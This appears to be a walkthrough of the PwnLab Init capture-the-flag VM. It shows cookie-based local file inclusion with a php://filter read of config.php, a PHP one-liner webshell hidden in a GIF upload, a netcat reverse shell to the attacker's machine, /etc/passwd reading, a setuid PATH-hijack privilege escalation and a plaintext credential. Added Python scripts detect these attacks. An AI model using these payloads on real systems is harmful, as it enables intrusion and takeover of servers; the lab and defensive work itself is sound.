CTF: PwnLab Init Walkthrough




In this walkthrough, I’ll be using Parrot OS. I’ll break each vulnerability down and explain it. The video won’t demonstrate all of the techniques that could have been applied. I will also list the techniques I’ve learned from others.

Exploits / Techniques

  • Local File Inclusions (LFI)
  • Password Reuse
  • Privilege Elevation through compiled code
  • Remote Code Execution
  • Reverse Shell
  • Spawning Interactive Shells



First, identify the virtual machine (VM) on the network by using netdiscover.

sudo netdiscover -r
(netdiscover results: discovering the PwnLab Init VM)


Use Nikto to scan the website for general information and exploits.

nikto --host

In the results below you can see that Nikto found the config.php file. We’ll get the database credentials out of that file.

(nikto scan results)

Local File Inclusion

The code we will be exploiting is an include that looks as if it is supposed to load a language file selected by a cookie. Comments in the source note that this code is unfinished.

if (isset($_COOKIE['lang']))

PHP Base64 Filter

This exploit uses the php://filter/convert.base64-encode conversion filter. The filter runs before the file is included, and because it base64-encodes the file’s contents, the PHP source comes back as text instead of being executed. That lets us read files on the server before they are processed.

Then we can retrieve the configuration file, which contains the MySQL database connection information.
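From the defender’s side, the cookie values this technique produces are easy to spot if the web server logs the Cookie request header. The following is an added example, not code from the walkthrough or from PwnLab: it assumes an Apache-style access log whose LogFormat ends in a quoted "%{Cookie}i" field (a constructed format), and the sample log lines are constructed to mirror the wrapper, traversal and /etc/passwd reads discussed on this page.

```python
"""Flag suspicious 'lang' cookie values in web server access logs.

Added example (not part of the original walkthrough). Assumes a log format
that appends the quoted Cookie request header to each line; the log lines
in SAMPLE_LOG are constructed for this example.
"""
import re
from typing import Optional
from urllib.parse import unquote

# Indicators that the cookie is being used for file inclusion rather than
# for picking one of the site's own language files.
SUSPICIOUS = {
    "php_wrapper": re.compile(r"php://", re.I),          # php://filter, php://input ...
    "traversal": re.compile(r"\.\.[\\/]"),               # ../ anywhere in the value
    "absolute_path": re.compile(r"^/"),                  # /etc/..., /var/...
    "sensitive_file": re.compile(r"/etc/(passwd|shadow)|config\.php", re.I),
    "null_byte": re.compile(r"%00|\x00"),
}

COOKIE_RE = re.compile(r"(?:^|;\s*)lang=([^;]*)")
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<req>[^"]*)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<cookie>[^"]*)"$'
)

# Constructed sample: one benign request, then three inclusion attempts.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2020:10:00:00 +0000] "GET /index.php?page=login HTTP/1.1" 200 1234 "lang=en.php"',
    '10.0.0.9 - - [01/Jan/2020:10:00:05 +0000] "GET /index.php HTTP/1.1" 200 5120 '
    '"PHPSESSID=abc123; lang=php%3A%2F%2Ffilter/convert.base64-encode/resource=../config.php"',
    '10.0.0.9 - - [01/Jan/2020:10:00:09 +0000] "GET /index.php HTTP/1.1" 200 2048 "lang=../../../../etc/passwd"',
    '10.0.0.9 - - [01/Jan/2020:10:00:15 +0000] "GET /index.php?cmd=id HTTP/1.1" 200 310 "lang=../upload/abc.gif"',
]


def extract_lang(cookie_header: str) -> Optional[str]:
    """Return the URL-decoded value of the 'lang' cookie, or None if absent."""
    m = COOKIE_RE.search(cookie_header)
    return unquote(m.group(1)) if m else None


def classify(lang_value: str) -> list:
    """Names of every suspicious pattern the cookie value matches (may be empty)."""
    return [name for name, rx in SUSPICIOUS.items() if rx.search(lang_value)]


def scan_log(lines) -> list:
    """Parse each log line and report requests whose lang cookie looks like LFI."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not in the expected format; skip rather than guess
        lang = extract_lang(m["cookie"])
        if lang is None:
            continue
        reasons = classify(lang)
        if reasons:
            findings.append({"ip": m["ip"], "time": m["ts"], "lang": lang, "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f['ip']} {f['time']} lang={f['lang']!r} -> {', '.join(f['reasons'])}")
```

The value is decoded before matching so that percent-encoded wrappers such as php%3A%2F%2F are caught; the benign en.php line produces no finding, while the base64 filter, the /etc/passwd read and the included upload are each reported with the reasons that fired.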

Uploading and Exploiting Using an Image

Create a .gif file using vim and insert the following into it.

<?php system($_GET["cmd"]) ?>

Then upload the image and retrieve the image path by right clicking and inspecting the image.

Using the console in Firefox I was able to set the cookie so that the uploaded image is included by the website. This gives us remote code execution.
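The upload step works because the server trusts the file extension and later includes the file as PHP. The check below is an added example, not code from the walkthrough or from PwnLab; it shows the server-side validation a defender would want on an image upload endpoint (extension allow-list, magic-byte check, scan for embedded PHP tags), with constructed sample uploads including one that carries the one-liner shown above. The function and file names are assumptions for this example.

```python
"""Validate an image upload before storing it.

Added example (not part of the original walkthrough). The uploads below are
constructed; MAGIC and the tag pattern are the only real-world values.
"""
import re
from typing import List

ALLOWED_EXT = {"gif", "png", "jpg", "jpeg"}

# Leading bytes of the formats we accept.
MAGIC = {
    "gif": (b"GIF87a", b"GIF89a"),
    "png": (b"\x89PNG\r\n\x1a\n",),
    "jpg": (b"\xff\xd8\xff",),
    "jpeg": (b"\xff\xd8\xff",),
}

# PHP open tags anywhere in the body; a real image has no reason to contain them.
PHP_TAG = re.compile(rb"<\?(?:php\b|=)")


def check_image_upload(filename: str, data: bytes) -> List[str]:
    """Return a list of problems; an empty list means the upload is acceptable."""
    problems = []
    ext = filename.rsplit(".", 1)[-1].lower() if "." in filename else ""
    if ext not in ALLOWED_EXT:
        problems.append("extension")
    elif not data.startswith(MAGIC[ext]):
        problems.append("magic")
    if PHP_TAG.search(data):
        problems.append("embedded_php")
    return problems


# Constructed samples: a plain GIF, a GIF with PHP appended (the page's
# technique), a PHP file with an image extension, and a PNG named .gif.
SAMPLES = {
    "clean.gif": b"GIF89a\x01\x00\x01\x00\x80\x00\x00" + b"\x00" * 16 + b";",
    "shell.gif": b"GIF89a" + b"\x00" * 10 + b'<?php system($_GET["cmd"]) ?>',
    "shell.php": b'<?php system($_GET["cmd"]) ?>',
    "notgif.gif": b"\x89PNG\r\n\x1a\n" + b"\x00" * 8,
}


def audit_samples() -> dict:
    """Run the check over every constructed sample."""
    return {name: check_image_upload(name, body) for name, body in SAMPLES.items()}


if __name__ == "__main__":
    for name, problems in audit_samples().items():
        print(f"{name}: {'OK' if not problems else ', '.join(problems)}")
```

Even with these checks, the decisive mitigation is that uploaded files must never reach an include(): store them outside the web root under server-generated names and serve them as static content, so a file that passes as a valid GIF still cannot be executed as PHP.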


Using the file inclusion we are able to enumerate the users on the host machine by reading /etc/passwd.

Gaining Access to the MySQL Database

mysql -h -u root -p  

Reverse Shell

The reverse shell is accomplished through the local file inclusion vulnerability.

nc -nvlp 4444

After Netcat is listening on port 4444, paste the command below into the browser and it should pop a reverse shell.

Note: is the virtual machine we are attacking. is the host machine that I’m running Parrot OS on.

-nv 4444 -e /bin/bash

Spawn Interactive Shell

python -c 'import pty; pty.spawn("/bin/bash")'

Privilege Elevation

This part is rather tricky. I had to have some help and followed Abatchy’s (Mohamed Shahat) technique on this one. His post is worth reading; he tries several other techniques and lists more information than this post does.


Login as Kane

su kent
Password: JWzXuBJJNy 

In Kane’s home folder there is a msgmike file.

Inspecting the file with strings shows that it runs something similar to “cat /home/mike/msg.txt”.

strings msgmike 

The exploit is to create a shell script named cat and point the PATH environment variable at its directory, so it runs instead of the system’s cat program. This needs to be done in Kane’s home folder.

echo "/bin/bash" > cat
chmod 777 cat
export PATH=/home/kane

This will return something funny like “bash: dircolors: command not found”, because the new shell’s PATH now contains only /home/kane.

Then you need to reset your export PATH variable.

export PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin
cd ../mike
ls -al
opensesame; bash -p
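The root cause of the msgmike step is a setuid binary that calls a command by its bare name and inherits the caller’s PATH. An administrator can hunt for that class of bug before an attacker does. The script below is an added example, not code from the walkthrough or from Abatchy’s post: it walks a filesystem for setuid binaries and scans each one’s printable strings for commands that are not invoked by absolute path. The list of well-known utilities, the walker’s root directory and the sample binary bytes (a constructed imitation of what strings showed for msgmike) are assumptions for this example; the scan is a heuristic, not a disassembly.

```python
"""Audit setuid binaries for PATH-dependent command invocations.

Added example (not part of the original walkthrough). SAMPLE_BINARY is a
constructed byte blob that imitates the strings output of a binary which
calls system("cat /home/mike/msg.txt"); KNOWN_UTILS is an assumed list.
"""
import os
import re
import stat
from typing import Iterable, List

# Commands commonly reached through system()/popen(); a bare name here means
# the binary resolves it through the caller's PATH.
KNOWN_UTILS = {
    "cat", "ls", "echo", "sh", "bash", "id", "whoami", "cp", "mv", "rm",
    "chmod", "chown", "ps", "grep", "awk", "sed", "touch", "mkdir", "tar",
    "gzip", "find", "head", "tail", "less", "more",
}

PRINTABLE_RUN = re.compile(rb"[\x20-\x7e]{4,}")  # same idea as strings(1)


def printable_strings(data: bytes) -> List[str]:
    """Extract runs of 4+ printable ASCII bytes, as strings(1) would."""
    return [m.group(0).decode("ascii") for m in PRINTABLE_RUN.finditer(data)]


def path_dependent_commands(data: bytes, known: Iterable[str] = KNOWN_UTILS) -> List[str]:
    """Strings whose first word is a known utility given without a slash."""
    known = set(known)
    hits = []
    for s in printable_strings(data):
        words = s.split()
        if not words:
            continue
        first = words[0]
        if "/" not in first and first in known:
            hits.append(s)  # e.g. "cat /home/mike/msg.txt" -> resolved via PATH
    return hits


def find_setuid_binaries(root: str = "/usr") -> List[str]:
    """Regular files under root with the setuid bit set (root is an assumption)."""
    found = []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                st = os.lstat(path)
            except OSError:
                continue
            if stat.S_ISREG(st.st_mode) and st.st_mode & stat.S_ISUID:
                found.append(path)
    return found


def audit(path: str) -> List[str]:
    """Read one binary and report its PATH-dependent command strings."""
    with open(path, "rb") as fh:
        return path_dependent_commands(fh.read())


# Constructed imitation of msgmike's strings: one relative command, one absolute.
SAMPLE_BINARY = (
    b"\x7fELF\x02\x01\x01" + b"\x00" * 8
    + b"cat /home/mike/msg.txt\x00"
    + b"/bin/echo %s >> /root/messages.txt\x00"
    + b"setreuid\x00"
    + b"GCC: (Debian 4.9.2-10) 4.9.2\x00"
)

if __name__ == "__main__":
    print("sample:", path_dependent_commands(SAMPLE_BINARY))
    for binary in find_setuid_binaries():
        for cmd in audit(binary):
            print(f"{binary}: {cmd!r}")
```

The sample reports only "cat /home/mike/msg.txt"; the absolute /bin/echo invocation is not flagged. The fix for a binary that trips this check is the mirror image of the attack on this page: call the helper by absolute path (or with execve and a fixed environment) and reset PATH before running anything as the elevated user.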

Capture The Flag